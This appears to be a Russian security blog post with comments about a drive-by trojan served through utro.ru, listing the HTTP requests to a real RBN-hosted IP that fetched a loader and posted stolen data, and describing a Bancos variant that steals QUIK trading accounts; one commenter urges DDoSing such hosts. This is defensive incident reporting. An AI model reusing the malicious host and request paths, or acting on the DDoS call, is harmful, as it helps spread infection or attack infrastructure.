Cегодня около 16:00 на utro.ru семерка IE предложила установить Microsoft Data Access Object.
При подробном рассмотрении видим запросы в известный криминальный диапазон RBN
GET /e1/index.php HTTP/1.1\r\n
Referer: http://utro.ru/includes5/banners/advert_part.html/r/n
Host: 81.95.149.66\r\n
а дальше загрузка бота
GET /e1/file.php HTTP/1.1\r\n
GET /ldr1.exe HTTP/1.1\r\n
GET /cfg.bin HTTP/1.0\r\n
POST /s.php?1=april_002fdf3f&i= HTTP/1.0\r\n
В корне с: остался файл 3.tmp. Детектируется большинством антивирусов как
Trojan-Spy.Win32.Bancos.aam
В windows/system32 поселился ntos.exe. Детектится также.
По уточненной информации из Лаборатории Касперского троян ориентирован на кражу аккаунтов системы QUIK.
QUIK — это программный комплекс для организации доступа к биржевым торговым системам в режиме on-line. Совершение сделок с ценными бумагами через интернет называется интернет-трейдингом. Состоит QUIK из серверной части и рабочих мест (терминалов) клиента, взаимодействующих между собой через интернет.
utro.ru уведомили
RBN извинилась и троян прибила вместе с сервером
10 комментариев:
Урс, это не gpcode
все веселей...
-
QUIK — это программный комплекс для организации доступа к биржевым торговым системам в режиме on-line. Совершение сделок с ценными бумагами через интернет называется интернет-трейдингом. Состоит QUIK из серверной части и рабочих мест (терминалов) клиента, взаимодействующих между собой через интернет.
их файлы
secring.txk
pubring.txk
qrypto.cfg
это не для шифрования, они просто пиздили аккаунты этой системы
в аську выйди
я всю ночь на посту
поправь текст тут и на секлабе
вместо
"По информации из Лаборатории Касперского троян шифрует пользовательские данные на компьютере и предлагает купить расшифровщик. В случае отказа грозится расшарить приватные данные пользователя.
http://www.viruslist.com/ru/viruses/encyclopedia?virusid=164339"
надо написать что трой ориентирован на кражу аккаунтов системы QUIK.
QUIK — это программный комплекс для организации доступа к биржевым торговым системам в режиме on-line. Совершение сделок с ценными бумагами через интернет называется интернет-трейдингом. Состоит QUIK из серверной части и рабочих мест (терминалов) клиента, взаимодействующих между собой через интернет.
врятли этот хост был удален. Скорее всего это абузоустойчивый хостинг, прикрыли фаером или сменили апишник.
Таких хостов досить надо в ответ!
Ну не резолвится на этом адресе и ладно... А ДДос это зло, не наш метод.
не наш, но надо. Других методов нет. Против лома нет приема.
Хост они точно не вырубили. Смотрите сами.
All scans completed, exiting
iNiTro:@ ~ # ping 81.95.149.66
PING 81.95.149.66 (81.95.149.66) 56(84) bytes of data.
From 81.95.156.58 icmp_seq=1 Destination Net Unreachable
From 81.95.156.58 icmp_seq=2 Destination Net Unreachable
--- 81.95.149.66 ping statistics ---
2 packets transmitted, 0 received, +2 errors, 100% packet loss, time 999ms
iNiTro:@ ~ # traceroute 81.95.149.66
traceroute to 81.95.149.66 (81.95.149.66), 30 hops max, 40 byte packets
3 DPT-Novgor-SRP1-1.ip.peterstar.net (217.195.91.150) 1.313 ms 1.233 ms 1.169 ms
4 J10-1-325.ge-0-3-0-7.ip.peterstar.net (82.140.89.190) 1.770 ms 1.781 ms 1.622 ms
5 J7-1-325.ge-0-3-0-50.peterstar.net (84.204.188.1) 2.644 ms 4.497 ms 2.070 ms
6 spb-dsr2-ae0-7.rt-comm.ru (195.161.4.33) 2.185 ms 2.453 ms 2.516 ms
7 lnd-bgw1-po1-0-0-0.rt-comm.ru (217.106.7.46) 53.354 ms 49.308 ms 49.634 ms
8 195.66.226.167 (195.66.226.167) 50.457 ms 48.197 ms 67.128 ms
9 rbn.fe3-29.br02.ldn01.pccwbtn.net (63.218.52.114) 54.032 ms 55.839 ms 53.646 ms
10 gbit-eth-34-uk.sbttel.com (81.95.156.34) 54.492 ms 56.463 ms 59.865 ms
11 oc-3-sbttel.rbnnetwork.com (81.95.156.58) 55.106 ms !N 50.628 ms !N 55.352 ms !N
iNiTro:@ ~ #
просто их gateway настроен что бы ответь host unreacheable вот и все.
Судя по трейсам хост недоступен из России
Спасибо Нитро, мы поправили тему. Абьюзники они и есть обьюзники.
дейстствительно.
Вообщем ребята живет весело на панамах. Жарко наверно там =)
Ребята живут в Питере и там дождливо =)
Отправить комментарий